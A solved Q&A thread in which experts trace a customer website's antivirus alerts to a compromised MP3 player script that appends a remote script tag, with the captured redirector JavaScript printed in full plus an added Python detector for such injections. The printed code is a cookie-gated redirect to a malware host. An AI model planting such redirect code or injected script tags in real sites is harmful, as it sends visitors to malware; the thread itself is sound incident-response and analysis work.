Solved

exploit script injection 1573

Posted on 2010-08-23
Last Modified: 2013-11-22
Hi, I've been reading here about this issue - I've got it from AVG9.0 with a customer's website, it appears as soon as I try to access any of his music pages - ballads for example.
It appears on all browsers, but doesn't happen if AVG not installed on a PC (I tried it).
I read that it could be due to "injected" javascript code, but this isn't the case for me.
The website in my case is http://www.heavenly-audio.com/audio/ballads/ballads.html.

Any ideas much appreciated.
Question by:mpcs_plymouth
10 Comments
 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33505320
Well, your website has two scripts which do not belong to the original website:

http://www.google-analytics.com/ga.js
http://maxtracker.net/track_s/new_site.php?s=www.heavenly-audio.com

I am aware of google-analytics, however what is the maxtracker.net (php) script here for?

Try to get the Maxtracker script removed from the website and then try with AVG.

Sudeep
 

Author Comment

by:mpcs_plymouth
ID: 33505475
Hi Sudeep,

Thanks for your prompt reply. Thanks for pointing that out... except that I can't find the script you mention?

Where did you find this and on which page - the one I mentioned?

Mike
 

Author Comment

by:mpcs_plymouth
ID: 33505539
Hi again, I think I've just found the offending code, not where I thought it was...

Will let you know the outcome ...
 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33505542
Yes indeed, it is on the page you mentioned that is giving you trouble.

How did I find it?

I used Firefox with addon No Script.

Sudeep
 

Author Comment

by:mpcs_plymouth
ID: 33505642
It appears to come from "swfobject.js", but luckily I've got an older backup of the webpage and this is identical. Could it still be the problem, and not the HTML?
I did notice that the "Instrumental" page hasn't been affected yet, I guess it soon will... :/
 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33505722
Plain HTML would not be an issue, since script injection could only be done by scripts (js, php etc.) but it could not be done with HTML only (AFAIK).

Sudeep
 
LVL 12

Expert Comment

by:jahboite
ID: 33506787
You can just delete the last two lines of swfobject.js (i.e. the seconds_passed function, the iframe write and the call to setTimeout). See if that stops the warning.
 

Author Comment

by:mpcs_plymouth
ID: 33508383
Thanks for your suggestion jahboite, but that didn't work I'm afraid; I still get the same problem, see the attached JPG for further clarity. Still not sure if it's the website or AVG, to be honest...?
Untitled-1.jpg
 
LVL 12

Accepted Solution

by: jahboite (earned 500 total points)
ID: 33508959
Great job posting that screenshot Mike, most helpful.

So I think you need to find an alternative way to play mp3 files because that flashmp3player.php script is definitely doing something dodgy - I suspect it is redirecting your visitors (in the background) to malware laden websites.

Like SSharma, I also use Firefox and NoScript, and this allows me to request a page confident that any client-side code delivered in a response will not be executed unless I specifically allow it.

So I requested the following:

http : // www . heavenly-audio . com /audio/ballads/flashmp3player.php?file_dir=/index.html

Instead of supplying the file_dir parameter as an actual playlist, I've supplied just a valid file path (/index.html). The response looks like this:

<?xml version="1.0" encoding="utf-8"?>
<playlist>
</playlist><script src="http : // onlineisdudescars . com/co . php"></script>

I've added the spaces in the URL to prevent hyperlinking in this thread. So what does the script at co.php look like? The attached snippet of code shows what the script at co.php looks like. Its purpose is to set a cookie and then redirect to protect-soft84. This is the start of a chain of several redirects involving heavily obfuscated JavaScripts (a technique used to make difficult the analysis of the script) and it's a fair bet that the intention is to attempt to infect the visitors' computers with malware (although I didn't go as far as to see what the payload was - I'm confident it's not nice).

So the first course of action is to make a backup of flashmp3player.php and then remove it from the server. This should stop the AVG alerts and prevent your site being blacklisted for delivering malware (it may already have been blacklisted however).

Then you will want to find out whether the script was always evil or whether someone has compromised your webserver and modified the script to be evil.

Always remember that third party scripts that you use on your website need to be carefully audited because you are giving permission for that third party to serve content to your visitors via your site.

Hope that helps a bit, please let us know how you get on.


// Attached snippet: the redirector served as co.php, as captured by jahboite.
// osc(): set a cookie named `cone` with value `val`, expiring `ex` days from now.
function osc(cone,val,ex){
	var exdate=new Date();
	var da = exdate.getDate()+ex;
	exdate.setDate(da);
	var oo = exdate.toGMTString();
	document.cookie=cone+"="+escape(val)+";expires="+oo;
}

// ogc(): read the value of the cookie named `cone`, or "" if it is not set.
function ogc(cone){
	if (document.cookie.length>0){
		cose=document.cookie.indexOf(cone+"=");
		if (cose!=-1){
			cose=cose+cone.length+1;
			coee=document.cookie.indexOf(";",cose);
			if (coee==-1) 
				coee=document.cookie.length;
			return unescape(document.cookie.substring(cose,coee));
		}
	}
	return "";
}

// The "nopezorenope" cookie marks visitors who have already been redirected,
// so each visitor is sent on to the next hop only once every 20 days; this is
// what makes the redirect hard to reproduce on a second visit.
var n=ogc("nopezorenope");
if (n==""){
	var pole="http : // www4 . protect-soft84 . co . cc /?p=p52dcWplbnCHnc3KbmNToKV1iqHWnG3LXsSYnGmZZmyaxA%3D%3D";
	osc("nopezorenope","1",20);
	window.top.location.replace(pole);
}

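A defender-side check for the pattern jahboite describes (a script tag glued on after the closing </playlist> of the player's XML response, loading from a host the site never used). This is an added Python example, not code from the thread; the response bodies, the attacker host (a placeholder) and the allowlist are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample, modelled on the response body quoted in the thread.
# The real injected host is not reproduced; "attacker.invalid" is a placeholder.
SAMPLE_RESPONSE = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<playlist>\n'
    '</playlist><script src="http://attacker.invalid/co.php"></script>\n'
)

# Constructed example of what a genuine playlist response should look like.
CLEAN_RESPONSE = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<playlist>\n'
    '  <track><location>ballads/track01.mp3</location></track>\n'
    '</playlist>\n'
)

# Hosts the site legitimately loads scripts from (an assumption for the example).
ALLOWED_SCRIPT_HOSTS = {"www.heavenly-audio.com", "www.google-analytics.com"}

SCRIPT_TAG = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)


def find_injected_scripts(body, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return findings for <script src=...> tags that do not belong in an XML
    playlist: any tag after the root element closes, or any tag whose host is
    not on the allowlist. An empty list means nothing suspicious was seen."""
    findings = []
    root_end = body.rfind("</playlist>")
    for m in SCRIPT_TAG.finditer(body):
        src = m.group(1)
        host = urlparse(src).hostname or ""
        reasons = []
        if root_end != -1 and m.start() > root_end:
            reasons.append("script appended after closing </playlist>")
        if host not in allowed_hosts:
            reasons.append("script host %r not on allowlist" % host)
        if reasons:
            findings.append({"src": src, "host": host, "reasons": reasons})
    return findings


def is_well_formed_xml(body):
    """Cheap sanity check: a genuine playlist parses, while a response with a
    <script> tag appended after the root element is rejected as trailing junk."""
    try:
        ET.fromstring(body.encode("utf-8"))
        return True
    except ET.ParseError:
        return False
```

Run it against the body returned for a request like the one above (with a harmless file_dir value) rather than against the saved PHP source, since the injection may live in an included file or in a modified library such as swfobject.js.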
 

Author Closing Comment

by:mpcs_plymouth
ID: 33510037
Thanks to everyone who assisted on this one, I've elected to take the "revamp the flash music player" option, a pain to do, but at least should stop the problems.

I'll also be changing the FTP password as well!

Thanks again.
